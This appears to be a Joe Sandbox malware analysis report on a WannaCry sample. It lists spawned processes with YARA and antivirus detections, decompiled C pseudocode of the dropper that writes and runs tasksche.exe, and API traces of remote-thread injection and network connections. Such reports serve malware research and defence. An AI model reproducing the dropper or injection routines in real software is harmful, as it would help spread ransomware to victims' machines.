                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                              Imagebase:0x7ff7748d0000
                                                                              File size:19352 bytes
                                                                              MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:29
                                                                              Start time:17:51:44
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\tasksche.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\WINDOWS\tasksche.exe /i
                                                                              Imagebase:0x400000
                                                                              File size:3514368 bytes
                                                                              MD5 hash:3233ACED9279EF54267C479BBA665B90
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp, Author: us-cert code analysis team
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001D.00000000.347152674.000000000040E000.00000008.00000001.01000000.00000008.sdmp, Author: us-cert code analysis team
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 85%, Metadefender
                                                                              • Detection: 95%, ReversingLabs

                                                                              Target ID:30
                                                                              Start time:17:51:46
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:31
                                                                              Start time:17:52:02
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000000.384952230.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000002.785042903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:32
                                                                              Start time:17:52:04
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000000.389181031.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.785080117.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:33
                                                                              Start time:17:52:06
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000000.392931300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.785141452.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:34
                                                                              Start time:17:52:12
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.785106286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000000.407443351.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:35
                                                                              Start time:17:52:14
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.785122913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000000.411115059.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:36
                                                                              Start time:17:52:19
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                              Imagebase:0x7ff7748d0000
                                                                              File size:19352 bytes
                                                                              MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:37
                                                                              Start time:17:52:22
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.427531330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.785172242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:38
                                                                              Start time:17:52:24
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.431362516.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.785177108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:39
                                                                              Start time:17:52:25
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000000.435545169.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:40
                                                                              Start time:17:52:26
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                                Execution Graph

                                                                                Execution Coverage:4.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:63.2%
                                                                                Total number of Nodes:687
                                                                                Total number of Limit Nodes:11
7393->7405 7394 b94056 lstrlen 7394->7393 7394->7394 7395 b94081 socket 7398 b940a6 connect 7395->7398 7395->7405 7396 b94320 RtlExitUserThread 7397 b942d0 SetEvent 7397->7405 7400 b942b7 closesocket 7398->7400 7398->7405 7399 b942f2 Sleep ResetEvent 7399->7405 7400->7405 7401 b940ef GetVersionExA 7401->7405 7402 b94172 wsprintfA 7402->7405 7403 b941a7 CreateThread CloseHandle 7403->7405 7404 b941f6 GetTickCount 7404->7405 7405->7393 7405->7394 7405->7395 7405->7396 7405->7397 7405->7399 7405->7400 7405->7401 7405->7402 7405->7403 7405->7404 7406 b94288 Sleep 7405->7406 7406->7405 7407 b94294 GetTickCount 7406->7407 7407->7405 7409 b93f14 7408->7409 7410 b93f25 7409->7410 7437 b93405 7409->7437 7412 b93f4f 7410->7412 7413 b93f31 CreateThread CloseHandle 7410->7413 7414 b93f60 43 API calls 7412->7414 7413->7412 7415 b93f54 7414->7415 7416 b910ce 2 API calls 7415->7416 7417 b93f7e 7416->7417 7445 b93f8f LoadLibraryA 7417->7445 7438 b9343b 7437->7438 7438->7438 7439 b93440 NtOpenSection 7438->7439 7440 b9345f NtQuerySystemInformation 7439->7440 7444 b935f3 7439->7444 7441 b9346f MapViewOfFile CloseHandle 7440->7441 7443 b934b0 7441->7443 7441->7444 7442 b934b7 UnmapViewOfFile 7442->7444 7443->7442 7443->7444 7444->7410 7446 b93f9d 7445->7446 7447 b94320 RtlExitUserThread 7445->7447 7448 b910ce 2 API calls 7446->7448 7449 b93fb5 7448->7449 7449->7447 7450 b93fc2 WSAStartup CreateThread CloseHandle 7449->7450 7451 b93ffa CreateEventA 7450->7451 7454 b94012 7451->7454 7452 b94065 gethostbyname 7452->7454 7453 b94056 lstrlen 7453->7452 7453->7453 7454->7447 7454->7452 7454->7453 7455 b94081 socket 7454->7455 7456 b942d0 SetEvent 7454->7456 7458 b942f2 Sleep ResetEvent 7454->7458 7459 b942b7 closesocket 7454->7459 7460 b940ef GetVersionExA 7454->7460 7461 b94172 wsprintfA 7454->7461 7462 b941a7 CreateThread CloseHandle 7454->7462 7463 b941f6 GetTickCount 7454->7463 7464 b94288 Sleep 7454->7464 7455->7454 7457 b940a6 connect 7455->7457 7456->7454 7457->7454 7457->7459 
7458->7454 7459->7454 7460->7454 7461->7454 7462->7454 7463->7454 7464->7454 7465 b94294 GetTickCount 7464->7465 7465->7454 7467 b93d7d 7466->7467 7468 b910ce 2 API calls 7466->7468 7469 b93d92 GetTickCount 7467->7469 7468->7467 7470 b93daa 7469->7470 7471 b93e47 GetVolumeInformationA 7470->7471 7472 b93e7a 7471->7472 7473 b93f25 7472->7473 7474 b93eb5 96 API calls 7472->7474 7475 b93f4f 7473->7475 7476 b93f31 CreateThread CloseHandle 7473->7476 7477 b93ea9 7474->7477 7478 b93f60 43 API calls 7475->7478 7476->7475 7477->7473 7479 b93f14 7477->7479 7481 b93eca GetModuleFileNameA wsprintfA 7477->7481 7480 b93f54 7478->7480 7479->7473 7482 b93405 5 API calls 7479->7482 7483 b910ce 2 API calls 7480->7483 7481->7479 7482->7473 7484 b93f7e 7483->7484 7485 b93f8f 23 API calls 7484->7485 7486 b93f83 7485->7486 7487 b93ffa CreateEventA 7486->7487 7488 b93fd3 CreateThread CloseHandle 7486->7488 7501 b94012 7487->7501 7488->7487 7489 b94065 gethostbyname 7489->7501 7490 b94056 lstrlen 7490->7489 7490->7490 7491 b94081 socket 7494 b940a6 connect 7491->7494 7491->7501 7492 b94320 RtlExitUserThread 7493 b942d0 SetEvent 7493->7501 7496 b942b7 closesocket 7494->7496 7494->7501 7495 b942f2 Sleep ResetEvent 7495->7501 7496->7501 7497 b940ef GetVersionExA 7497->7501 7498 b94172 wsprintfA 7498->7501 7499 b941a7 CreateThread CloseHandle 7499->7501 7500 b941f6 GetTickCount 7500->7501 7501->7489 7501->7490 7501->7491 7501->7492 7501->7493 7501->7495 7501->7496 7501->7497 7501->7498 7501->7499 7501->7500 7502 b94288 Sleep 7501->7502 7502->7501 7503 b94294 GetTickCount 7502->7503 7503->7501 6478 b93399 6480 b933a2 6478->6480 6481 b933a9 Sleep 6480->6481 6481->6481 7072 b93819 7074 b9381f WaitForSingleObject 7072->7074 7075 b9383b closesocket 7074->7075 7076 b93845 7074->7076 7075->7076 6639 b90fd6 6640 b910a0 6639->6640 6641 b9115c 6640->6641 6642 b91133 GetModuleHandleA GetProcAddress 6640->6642 6642->6640 6482 b93888 6484 b9388e GetSystemTime 6482->6484 6492 b938d2 6484->6492 6485 b9390c 
Sleep 6485->6492 6486 b93a32 6487 b93924 InternetGetConnectedState 6487->6492 6488 b93954 gethostbyname 6489 b9397a socket 6488->6489 6488->6492 6490 b93990 ioctlsocket connect Sleep 6489->6490 6489->6492 6490->6492 6491 b93a1f closesocket 6491->6492 6492->6485 6492->6486 6492->6487 6492->6488 6492->6491 7077 b90000 7078 b90004 7077->7078 7079 b900a1 7078->7079 7081 b9025e 7078->7081 7085 b90105 7081->7085 7084 b90278 7084->7079 7086 b90116 GetPEB 7085->7086 7086->7084 6647 7fea1196 GetProcAddress

Control-flow Graph

C-Code - Quality: 86%
E00407CE0() {
	void _v259;
	char _v260;
	void _v519;
	char _v520;
	struct _STARTUPINFOA _v588;
	struct _PROCESS_INFORMATION _v604;
	long _v608;
	_Unknown_base(*)()* _t36;
	void* _t38;
	void* _t39;
	void* _t50;
	int _t59;
	struct HINSTANCE__* _t104;
	struct HRSRC__* _t105;
	void* _t107;
	void* _t108;
	long _t109;
	intOrPtr _t121;
	intOrPtr _t122;

	_t104 = GetModuleHandleW(L"kernel32.dll");
	if(_t104 != 0) {
		 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
		 *0x431458 = GetProcAddress(_t104, "CreateFileA");
		 *0x431460 = GetProcAddress(_t104, "WriteFile");
		_t36 = GetProcAddress(_t104, "CloseHandle");
		 *0x43144c = _t36;
		if( *0x431478 != 0) {
			_t121 =  *0x431458; // 0x76cdf7b0
			if(_t121 != 0) {
				_t122 =  *0x431460; // 0x76cdfc30
				if(_t122 != 0 && _t36 != 0) {
					_t105 = FindResourceA(0, 0x727, "R");
					if(_t105 != 0) {
						_t38 = LoadResource(0, _t105);
						if(_t38 != 0) {
							_t39 = LockResource(_t38);
							_v608 = _t39;
							if(_t39 != 0) {
								_t109 = SizeofResource(0, _t105);
								if(_t109 != 0) {
									_v520 = 0;
									memset( &_v519, 0, 0x40 << 2);
									asm("stosw");
									asm("stosb");
									_v260 = 0;
									memset( &_v259, 0, 0x40 << 2);
									asm("stosw");
									asm("stosb");
									sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
									sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
									MoveFileExA( &_v520,  &_v260, 1); // executed
									_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
									_t107 = _t50;
									if(_t107 != 0xffffffff) {
										WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
										CloseHandle(_t107);
										_v604.hThread = 0;
										_v604.dwProcessId = 0;
										_v604.dwThreadId = 0;
										memset( &(_v588.lpReserved), 0, 0x10 << 2);
										asm("repne scasb");
										_v604.hProcess = 0;
										_t108 = " /i";
										asm("repne scasb");
										memcpy( &_v520 - 1, _t108, 0 << 2);
										memcpy(_t108 + 0x175b75a, _t108, 0);
										_v588.cb = 0x44;
										_v588.wShowWindow = 0;
										_v588.dwFlags = 0x81;
										_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
										if(_t59 != 0) {
											CloseHandle(_v604.hThread);
											CloseHandle(_v604);
										}
									}
								}
							}
						}
					}
				}
			}
		}
	}
	return 0;
}

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F89FB10,?,00000000), ref: 00407CEF
• GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
• GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
• GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
• GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
• FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
• LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
• LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
• SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
• sprintf.MSVCRT ref: 00407E01
• sprintf.MSVCRT ref: 00407E18
• MoveFileExA.KERNEL32 ref: 00407E2C
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
• WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
• CloseHandle.KERNEL32(00000000), ref: 00407E68
• CreateProcessA.KERNELBASE ref: 00407EE8
• CloseHandle.KERNEL32(00000000), ref: 00407EF7
• CloseHandle.KERNEL32(08000000), ref: 00407F02
Strings
Memory Dump Source
• Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressHandleProcResource$CloseFile$Createsprintf$FindLoadLockModuleMoveProcessSizeofWrite
• String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
• API String ID: 4281112323-1507730452
• Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
• Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
• Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
• Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00B904BE
                                                                                • GetVersion.KERNEL32 ref: 00B90500
                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00B90528
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00B905AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocChangeCloseFindHandleModuleNotificationVersionVirtual
                                                                                • String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
                                                                                • API String ID: 2920002527-2732440246
                                                                                • Opcode ID: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
                                                                                • Instruction ID: 2e6f6150404bea961f42db9881debfdfcedde1f08683218da20bbe8c9619891a
                                                                                • Opcode Fuzzy Hash: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
                                                                                • Instruction Fuzzy Hash: 3BB1B971625209FFEF21AF24C84ABAA3BEDEF55310F1100A9E9089E181C7F49F449B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 88 b905f2-b90615 GetModuleHandleA call b910ce 91 b905a9-b905b3 FindCloseChangeNotification 88->91 92 b90617-b90630 88->92 96 b905ca-b905d1 91->96 93 b90639-b90648 92->93 94 b90632 92->94 95 b9064c-b90652 93->95 94->93 95->91 97 b90658-b90671 95->97 96->91 98 b905d3-b905fc SetProcessAffinityMask call b905f2 96->98 97->91 99 b90677-b90690 97->99 103 b905fe-b9061c 98->103 104 b90621-b90623 98->104 99->91 101 b90696-b9069c 99->101 105 b906d8-b906de 101->105 106 b9069e-b906b1 101->106 103->104 104->95 107 b90625-b90630 104->107 109 b906fc-b90715 lstrcpyW call b924ae 105->109 110 b906e0-b906f3 105->110 106->91 108 b906b7-b906bd 106->108 107->93 107->94 108->105 112 b906bf-b906d2 108->112 115 b9074c-b90775 NtMapViewOfSection 109->115 116 b90717-b90746 GetPEB lstrcpyW lstrcatW call b924ae 109->116 110->109 113 b906f5 110->113 112->91 112->105 113->109 115->91 118 b9077b-b9078f call b90305 NtOpenProcessToken 115->118 116->91 116->115 122 b90791-b907a3 call b9115d call b907ac 118->122 123 b907c5-b907e4 CreateToolhelp32Snapshot Process32First 118->123 134 b9080e-b9080f 122->134 135 b907a5 122->135 125 b907eb-b907f5 Process32Next 123->125 126 b90865-b90872 FindCloseChangeNotification 125->126 127 b907f7-b907fb 125->127 126->91 127->125 129 b907fd-b9080d OpenProcess 127->129 129->125 131 b9080f 129->131 133 b90810-b90818 call b92574 131->133 140 b9081a-b90820 133->140 141 b9085c-b90863 FindCloseChangeNotification 133->141 134->133 135->133 137 b907a7-b907e4 CreateToolhelp32Snapshot Process32First 135->137 137->125 140->141 142 b90822-b90832 140->142 141->125 142->141 143 b90834-b9084b CreateRemoteThread 142->143 143->141 144 b9084d-b90857 call b905ba 143->144 144->141
                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00B905AD
                                                                                • GetModuleHandleA.KERNEL32(00B905EC), ref: 00B905F2
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,\BaseNamedObjects\reytVt), ref: 00B9070A
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,?), ref: 00B9072D
                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\reytVt,\reytVt), ref: 00B9073B
                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00B9076B
                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00B90786
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B907C9
                                                                                • Process32First.KERNEL32 ref: 00B907DC
                                                                                • Process32Next.KERNEL32 ref: 00B907ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B90805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B90842
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B9085D
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00B9086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification$CreateOpenProcessProcess32lstrcpy$FirstHandleModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                • String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
                                                                                • API String ID: 3804105423-2732440246
                                                                                • Opcode ID: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
                                                                                • Instruction ID: a8d459b0d7f9b52ea409742e978a99c70a21afc03d545fe69f7898c9c237a6b8
                                                                                • Opcode Fuzzy Hash: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
                                                                                • Instruction Fuzzy Hash: 7A71AC31624109FFEF21AF50CC8AAAE3BEDEF59310F1140B9E9099E091C7B59F059B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 250 b9252f-b92573 NtOpenSection
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 00B9255E
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 00B9254B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenSection
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 1950954290-2991043827
                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                control_flow_graph 251 b92574-b9257c call b9252f 254 b92661-b92664 251->254 255 b92582-b925b4 NtMapViewOfSection FindCloseChangeNotification 251->255 255->254 256 b925ba-b925c0 255->256 257 b925ce-b925d8 256->257 258 b925c2-b925cb 256->258 259 b925da-b925e2 257->259 260 b925ef-b9262a call b92477 * 3 257->260 258->257 259->260 261 b925e4-b925ea call b92477 259->261 269 b9262c-b92632 call b92477 260->269 270 b92637-b9263f 260->270 261->260 269->270 272 b9264c-b92654 270->272 273 b92641-b92647 call b92477 270->273 272->254 275 b92656-b9265c call b92477 272->275 273->272 275->254
                                                                                APIs
                                                                                  • Part of subcall function 00B9252F: NtOpenSection.NTDLL(?,0000000E), ref: 00B9255E
                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00B925A4
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00B90815), ref: 00B925AC
                                                                                Memory Dump Source
